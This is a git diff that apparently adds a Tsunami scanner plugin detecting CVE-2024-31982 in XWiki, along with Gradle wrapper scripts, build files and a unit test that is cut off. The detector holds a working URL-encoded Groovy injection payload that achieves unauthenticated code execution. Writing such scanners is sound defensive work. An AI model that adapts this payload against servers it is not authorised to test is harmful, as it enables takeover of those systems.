if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/weblogic/cve202014883/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202014883/WebLogicAdminConsoleRceDetector.java b/google/detectors/rce/weblogic/cve202014883/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202014883/WebLogicAdminConsoleRceDetector.java index b7b5775a2..13f477654 100644 --- a/google/detectors/rce/weblogic/cve202014883/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202014883/WebLogicAdminConsoleRceDetector.java +++ b/google/detectors/rce/weblogic/cve202014883/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202014883/WebLogicAdminConsoleRceDetector.java @@ -70,7 +70,7 @@ public final class WebLogicAdminConsoleRceDetector implements VulnDetector { "", "unknown", // nmap could not determine the service name, we try to exploit anyway. "afs3-callback"); // most /etc/services list port 7001 as afs3-callback service - @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "Google"; + @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "GOOGLE"; @VisibleForTesting static final String VULNERABILITY_REPORT_ID = "CVE_2020_14883"; @VisibleForTesting diff --git a/google/detectors/rce/xwiki/cve202431982/README.md b/google/detectors/rce/xwiki/cve202431982/README.md new file mode 100644 index 000000000..e87e8eb1e --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/README.md @@ -0,0 +1,14 @@ +# CVE-2024-31982 RCE for xwiki + +This detector checks whether an xwiki instance is vulnerable to RCE-2024-31982 +which allows unauthenticated code execution. + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/google/detectors/rce/xwiki/cve202431982/build.gradle b/google/detectors/rce/xwiki/cve202431982/build.gradle new file mode 100644 index 000000000..2f6c9666b --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/build.gradle @@ -0,0 +1,83 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami VulnDetector plugin for CVE-2024-31982.' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + source = '8' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + floggerVersion = '0.5.1' + guavaVersion = '28.2-jre' + javaxInjectVersion = '1' + jsoupVersion = '1.9.2' + okhttpVersion = '3.12.0' + protobufVersion = '3.11.4' + tsunamiVersion = 'latest.release' + + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' +} + +dependencies { + implementation "com.google.flogger:flogger:${floggerVersion}" + implementation "com.google.flogger:google-extensions:${floggerVersion}" + implementation "com.google.flogger:flogger-system-backend:${floggerVersion}" + implementation "com.google.guava:guava:${guavaVersion}" + implementation "com.google.protobuf:protobuf-java:${protobufVersion}" + implementation "com.google.protobuf:protobuf-javalite:${protobufVersion}" + implementation "com.google.protobuf:protobuf-java-util:${protobufVersion}" + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + implementation "javax.inject:javax.inject:${javaxInjectVersion}" + implementation "org.jsoup:jsoup:${jsoupVersion}" + + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" +} diff --git a/google/detectors/rce/xwiki/cve202431982/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/xwiki/cve202431982/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..2c3521197 Binary files /dev/null and b/google/detectors/rce/xwiki/cve202431982/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/xwiki/cve202431982/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/xwiki/cve202431982/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/google/detectors/rce/xwiki/cve202431982/gradlew b/google/detectors/rce/xwiki/cve202431982/gradlew new file mode 100755 index 000000000..f5feea6d6 --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/gradlew @@ -0,0 +1,252 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd -P "${APP_HOME:-./}" > /dev/null && printf '%s +' "$PWD" ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/xwiki/cve202431982/gradlew.bat b/google/detectors/rce/xwiki/cve202431982/gradlew.bat new file mode 100644 index 000000000..9d21a2183 --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/gradlew.bat @@ -0,0 +1,94 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem +@rem SPDX-License-Identifier: Apache-2.0 +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/google/detectors/rce/xwiki/cve202431982/settings.gradle b/google/detectors/rce/xwiki/cve202431982/settings.gradle new file mode 100644 index 000000000..0979e1228 --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'cve202431982' diff --git a/google/detectors/rce/xwiki/cve202431982/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982BootstrapModule.java b/google/detectors/rce/xwiki/cve202431982/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982BootstrapModule.java new file mode 100644 index 000000000..a3d70919f --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982BootstrapModule.java @@ -0,0 +1,27 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.cve202431982; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** A {@link PluginBootstrapModule} for {@link Cve202431982Detector}. */ +public final class Cve202431982BootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(Cve202431982Detector.class); + } +} diff --git a/google/detectors/rce/xwiki/cve202431982/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982Detector.java b/google/detectors/rce/xwiki/cve202431982/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982Detector.java new file mode 100644 index 000000000..6962d8268 --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982Detector.java @@ -0,0 +1,138 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.cve202431982; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.net.http.HttpRequest.get; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import javax.inject.Inject; + +/** A {@link VulnDetector} that detects a remote code execution vulnerability in xwiki. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "CVE-2024-31982 detector", + version = "0.1", + description = "Detects remote code execution vulnerability in xwiki", + author = "Tsunami Team (tsunami-dev@google.com)", + bootstrapModule = Cve202431982BootstrapModule.class) +public final class Cve202431982Detector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final ImmutableList POSSIBLE_SUBPATHS = ImmutableList.of("", "xwiki/"); + // Decoded payload: '}}}{{async + // async=false}}{{groovy}}println("tsunami-detection:"+(2001+1024)){{/groovy}}{{/async}}' + // This will print 'tsunami-detection:3025' in the output. + private static final String PAYLOAD = + "%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22tsunami%2Ddetection%3A%22%2B%282001%2B1024%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D"; + private static final String TARGET_PATH = "bin/get/Main/DatabaseSearch?outputSyntax=plain&text="; + + private final Clock utcClock; + private final HttpClient httpClient; + + @Inject + Cve202431982Detector(@UtcClock Clock utcClock, HttpClient httpClient) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient).modify().build(); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("Starting detection: CVE-2024-31982 in xwiki"); + DetectionReportList detectionReports = + DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + + logger.atInfo().log( + "Detection for CVE-2024-31982 finished, detected '%d' vulns.", + detectionReports.getDetectionReportsCount()); + return detectionReports; + } + + private boolean isServiceVulnerable(NetworkService networkService) { + return POSSIBLE_SUBPATHS.stream() + .anyMatch(endpoint -> isEndpointVulnerable(networkService, endpoint)); + } + + private boolean isEndpointVulnerable(NetworkService networkService, String subpath) { + String targetUrl = + NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + + subpath + + TARGET_PATH + + PAYLOAD; + + try { + HttpResponse httpResponse = + httpClient.send(get(targetUrl).withEmptyHeaders().build(), networkService); + return (httpResponse.status().code() == 200 + && httpResponse.bodyString().get().contains("tsunami-detection:3025")); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to send request to %s", targetUrl); + return false; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo scannedTarget, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(scannedTarget) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder().setPublisher("GOOGLE").setValue("CVE-2024-31982")) + .addRelatedId( + VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2024-31982")) + .setSeverity(Severity.CRITICAL) + .setTitle("xwiki instance vulnerable to CVE-2024-31982") + .setRecommendation( + "Update to one of the patched versions of xwiki: 14.10.20, 15.5.4, 15.10-rc-1") + .setDescription( + "The xwiki instance is vulnerable to CVE-2024-31982. This vulnerability allows" + + " an attacker to take control of the xwiki instance and does not require" + + " authentication.")) + .build(); + } +} diff --git a/google/detectors/rce/xwiki/cve202431982/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982DetectorTest.java b/google/detectors/rce/xwiki/cve202431982/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982DetectorTest.java new file mode 100644 index 000000000..0144d694a --- /dev/null +++ b/google/detectors/rce/xwiki/cve202431982/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202431982/Cve202431982DetectorTest.java @@ -0,0 +1,164 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.cve202431982; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkEndpoint; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Tests for {@link Cve202431982Detector}. */ +@RunWith(JUnit4.class) +public final class Cve202431982DetectorTest { + + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + private static final String VULN_CONTENT = + "RSS feed for search on tsunami-detection:3025"; + + private static final Vulnerability EXPECTED_VULN = + Vulnerability.newBuilder() + .setMainId(VulnerabilityId.newBuilder().setPublisher("GOOGLE").setValue("CVE-2024-31982")) + .addRelatedId(VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2024-31982")) + .setSeverity(Severity.CRITICAL) + .setTitle("xwiki instance vulnerable to CVE-2024-31982") + .setRecommendation( + "Update to one of the patched versions of xwiki: 14.10.20, 15.5.4, 15.10-rc-1") + .setDescription( + "The xwiki instance is vulnerable to CVE-2024-31982. This vulnerability allows" + + " an attacker to take control of the xwiki instance and does not require" + + " authentication.") + .build(); + + private MockWebServer mockWebServer; + + @Inject private Cve202431982Detector detector; + + @Before + public void setUp() throws IOException { + mockWebServer = new MockWebServer(); + mockWebServer.start(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build(), + new Cve202431982BootstrapModule()) + .injectMembers(this); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + } + + @Test + public void detect_whenVulnerable_reportsVuln() { + mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody(VULN_CONTENT)); + ImmutableList httpServices = + ImmutableList.of( + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build()); + + var report = + detector + .detect(buildTargetInfo(forHostname(mockWebServer.getHostName())), httpServices) + .getDetectionReportsList(); + + assertThat(report) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(buildTargetInfo(forHostname(mockWebServer.getHostName()))) + .setNetworkService(httpServices.get(0)) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability(EXPECTED_VULN) + .build()); + } + + @Test + public void detect_whenNotVulnerableStatus_reportsNothing() { + mockWebServer.enqueue(new MockResponse().setResponseCode(404).setBody(VULN_CONTENT)); + ImmutableList httpServices = + ImmutableList.of( + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build()); + + var report = + detector + 